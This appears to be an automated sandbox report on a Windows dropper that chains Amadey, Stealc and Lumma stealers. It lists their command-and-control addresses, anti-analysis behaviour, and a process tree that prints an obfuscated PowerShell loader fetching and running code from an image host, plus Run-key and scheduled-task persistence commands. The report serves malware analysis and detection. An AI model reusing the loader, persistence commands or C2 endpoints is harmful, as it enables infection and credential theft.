Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
34s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06/12/2024, 00:17
Static task
static1
Behavioral task
behavioral1
Sample
458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
Resource
win7-20240903-en
General
-
Target
458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe
-
Size
1.8MB
-
MD5
cd86e4c2fbaf81cb17606d69108fff47
-
SHA1
97117dadf1a95214ceaf1d1d9337dae317c6a358
-
SHA256
458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
-
SHA512
42393ee97337b197a176032276b9da8bd3ba26d5e5a36751130271422a9cb0a91d50a22c9f75e4de77083b47d8b6c7f54c5f1ebccd09f97dbba8eb6591554748
-
SSDEEP
49152:1hYf1buEc90mDAkzorHA/GJKEmQVhiln:Mf1qEcvDTSNXmQVh6
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
default_valenciga
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://drive-connect.cyou/api
https://ratiomun.cyou/api
https://crib-endanger.sbs/api
https://faintbl0w.sbs/api
https://300snails.sbs/api
https://bored-light.sbs/api
https://3xc1aimbl0w.sbs/api
https://pull-trucker.sbs/api
https://fleez-inc.sbs/api
https://thicktoys.sbs/api
https://atten-supporse.biz/api
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://covery-mover.biz/api
https://drive-connect.cyou/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
https://dwell-exclaim.biz/api
https://formy-spill.biz/api
https://dare-curbys.biz/api
https://print-vexer.biz/api
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5b2f185e4f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GI59vO6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ BhD8htX.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0608197541.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GI59vO6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BhD8htX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0608197541.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GI59vO6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BhD8htX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5b2f185e4f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5b2f185e4f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0608197541.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation AllNew.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation rafencoder32.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 5b2f185e4f.exe -
Executes dropped EXE 22 IoCs
pid Process 3320 skotes.exe 4988 skotes.exe 740 5b2f185e4f.exe 544 axplong.exe 2024 stealc_default2.exe 4140 GI59vO6.exe 4732 alex2022.exe 1972 alex2022.exe 4976 alex2022.exe 2632 alex2022.exe 3164 BhD8htX.exe 2844 0608197541.exe 3288 AllNew.exe 1444 Gxtuum.exe 1732 i1A5m12.exe 548 i1A5m12.tmp 2008 rafencoder.exe 3220 stail.exe 3300 stail.tmp 5072 rafencoder32.exe 1156 trru7rd2.exe 3180 wL3EGdM.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine GI59vO6.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine BhD8htX.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 0608197541.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 5b2f185e4f.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine axplong.exe -
Loads dropped DLL 6 IoCs
pid Process 548 i1A5m12.tmp 2008 rafencoder.exe 2024 stealc_default2.exe 2024 stealc_default2.exe 3300 stail.tmp 5072 rafencoder32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 1116 powershell.exe 920 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 2976 cmd.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023d1c-7281.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4128 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 3320 skotes.exe 4988 skotes.exe 740 5b2f185e4f.exe 544 axplong.exe 4140 GI59vO6.exe 3164 BhD8htX.exe 2844 0608197541.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4732 set thread context of 2632 4732 alex2022.exe 106 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job 5b2f185e4f.exe File created C:\Windows\Tasks\Gxtuum.job AllNew.exe File created C:\Windows\Tasks\skotes.job 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0007000000023cc7-390.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 10 IoCs
pid pid_target Process procid_target 3244 2844 WerFault.exe 110 1860 2844 WerFault.exe 110 1388 2844 WerFault.exe 110 5184 4140 WerFault.exe 98 5192 2632 WerFault.exe 106 5636 3164 WerFault.exe 108 740 3164 WerFault.exe 108 2900 5564 WerFault.exe 155 5508 1196 WerFault.exe 159 6448 1196 WerFault.exe 159 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wL3EGdM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5b2f185e4f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BhD8htX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i1A5m12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stail.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AllNew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stail.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rafencoder32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language trru7rd2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GI59vO6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i1A5m12.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0608197541.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default2.exe -
Kills process with taskkill 6 IoCs
pid Process 5176 taskkill.exe 7164 taskkill.exe 5484 taskkill.exe 4468 taskkill.exe 5824 taskkill.exe 3284 taskkill.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5644 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 4128 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 4128 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 3320 skotes.exe 3320 skotes.exe 4988 skotes.exe 4988 skotes.exe 740 5b2f185e4f.exe 740 5b2f185e4f.exe 544 axplong.exe 544 axplong.exe 4140 GI59vO6.exe 4140 GI59vO6.exe 2024 stealc_default2.exe 2024 stealc_default2.exe 3164 BhD8htX.exe 3164 BhD8htX.exe 2844 0608197541.exe 2844 0608197541.exe 548 i1A5m12.tmp 548 i1A5m12.tmp 2024 stealc_default2.exe 2024 stealc_default2.exe 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 3300 stail.tmp 920 powershell.exe 920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3180 wL3EGdM.exe Token: SeDebugPrivilege 920 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4128 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 740 5b2f185e4f.exe 548 i1A5m12.tmp 3300 stail.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4128 wrote to memory of 3320 4128 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 83 PID 4128 wrote to memory of 3320 4128 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 83 PID 4128 wrote to memory of 3320 4128 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe 83 PID 3320 wrote to memory of 740 3320 skotes.exe 92 PID 3320 wrote to memory of 740 3320 skotes.exe 92 PID 3320 wrote to memory of 740 3320 skotes.exe 92 PID 740 wrote to memory of 544 740 5b2f185e4f.exe 95 PID 740 wrote to memory of 544 740 5b2f185e4f.exe 95 PID 740 wrote to memory of 544 740 5b2f185e4f.exe 95 PID 544 wrote to memory of 2024 544 axplong.exe 96 PID 544 wrote to memory of 2024 544 axplong.exe 96 PID 544 wrote to memory of 2024 544 axplong.exe 96 PID 3320 wrote to memory of 4140 3320 skotes.exe 98 PID 3320 wrote to memory of 4140 3320 skotes.exe 98 PID 3320 wrote to memory of 4140 3320 skotes.exe 98 PID 544 wrote to memory of 4732 544 axplong.exe 102 PID 544 wrote to memory of 4732 544 axplong.exe 102 PID 544 wrote to memory of 4732 544 axplong.exe 102 PID 4732 wrote to memory of 1972 4732 alex2022.exe 104 PID 4732 wrote to memory of 1972 4732 alex2022.exe 104 PID 4732 wrote to memory of 1972 4732 alex2022.exe 104 PID 4732 wrote to memory of 4976 4732 alex2022.exe 105 PID 4732 wrote to memory of 4976 4732 alex2022.exe 105 PID 4732 wrote to memory of 4976 4732 alex2022.exe 105 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 4732 wrote to memory of 2632 4732 alex2022.exe 106 PID 3320 wrote to memory of 3164 3320 skotes.exe 108 PID 3320 wrote to memory of 3164 3320 skotes.exe 108 PID 3320 wrote to memory of 3164 3320 skotes.exe 108 PID 544 wrote to memory of 2844 544 axplong.exe 110 PID 544 wrote to memory of 2844 544 axplong.exe 110 PID 544 wrote to memory of 2844 544 axplong.exe 110 PID 544 wrote to memory of 3288 544 axplong.exe 112 PID 544 wrote to memory of 3288 544 axplong.exe 112 PID 544 wrote to memory of 3288 544 axplong.exe 112 PID 3288 wrote to memory of 1444 3288 AllNew.exe 113 PID 3288 wrote to memory of 1444 3288 AllNew.exe 113 PID 3288 wrote to memory of 1444 3288 AllNew.exe 113 PID 3320 wrote to memory of 1732 3320 skotes.exe 120 PID 3320 wrote to memory of 1732 3320 skotes.exe 120 PID 3320 wrote to memory of 1732 3320 skotes.exe 120 PID 1732 wrote to memory of 548 1732 i1A5m12.exe 121 PID 1732 wrote to memory of 548 1732 i1A5m12.exe 121 PID 1732 wrote to memory of 548 1732 i1A5m12.exe 121 PID 548 wrote to memory of 1448 548 i1A5m12.tmp 122 PID 548 wrote to memory of 1448 548 i1A5m12.tmp 122 PID 548 wrote to memory of 1448 548 i1A5m12.tmp 122 PID 548 wrote to memory of 2008 548 i1A5m12.tmp 124 PID 548 wrote to memory of 2008 548 i1A5m12.tmp 124 PID 548 wrote to memory of 2008 548 i1A5m12.tmp 124 PID 1448 wrote to memory of 5116 1448 net.exe 125 PID 1448 wrote to memory of 5116 1448 net.exe 125 PID 1448 wrote to memory of 5116 1448 net.exe 125 PID 1444 wrote to memory of 3220 1444 Gxtuum.exe 129 PID 1444 wrote to memory of 3220 1444 Gxtuum.exe 129 PID 1444 wrote to memory of 3220 1444 Gxtuum.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"C:\Users\Admin\AppData\Local\Temp\458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Users\Admin\AppData\Local\Temp\1011459001\5b2f185e4f.exe"C:\Users\Admin\AppData\Local\Temp\1011459001\5b2f185e4f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2024
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"6⤵
- Executes dropped EXE
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"6⤵
- Executes dropped EXE
PID:4976
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 13167⤵
- Program crash
PID:5192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1002824001\0608197541.exe"C:\Users\Admin\AppData\Local\Temp\1002824001\0608197541.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 14846⤵
- Program crash
PID:1860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 14966⤵
- Program crash
PID:3244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 15846⤵
- Program crash
PID:1388
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe"C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\is-DD1J2.tmp\stail.tmp"C:\Users\Admin\AppData\Local\Temp\is-DD1J2.tmp\stail.tmp" /SL5="$1502B0,4048252,54272,C:\Users\Admin\AppData\Local\Temp\10000351101\stail.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3300 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause raf_encoder_12559⤵
- System Location Discovery: System Language Discovery
PID:3540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause raf_encoder_125510⤵
- System Location Discovery: System Language Discovery
PID:3844
-
-
-
C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder32.exe"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder32.exe" -i9⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "lDBNode55" -Value "C:\ProgramData\DNodedbtable\DNodedbtable.exe"10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"5⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"6⤵PID:1052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\10009630142\asyn.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
PID:1116 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn Admin /SC minute /MO 30 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\10009630142\asyn.ps1"" /F8⤵
- Scheduled Task/Job: Scheduled Task
PID:5644
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "8⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:2976
-
-
-
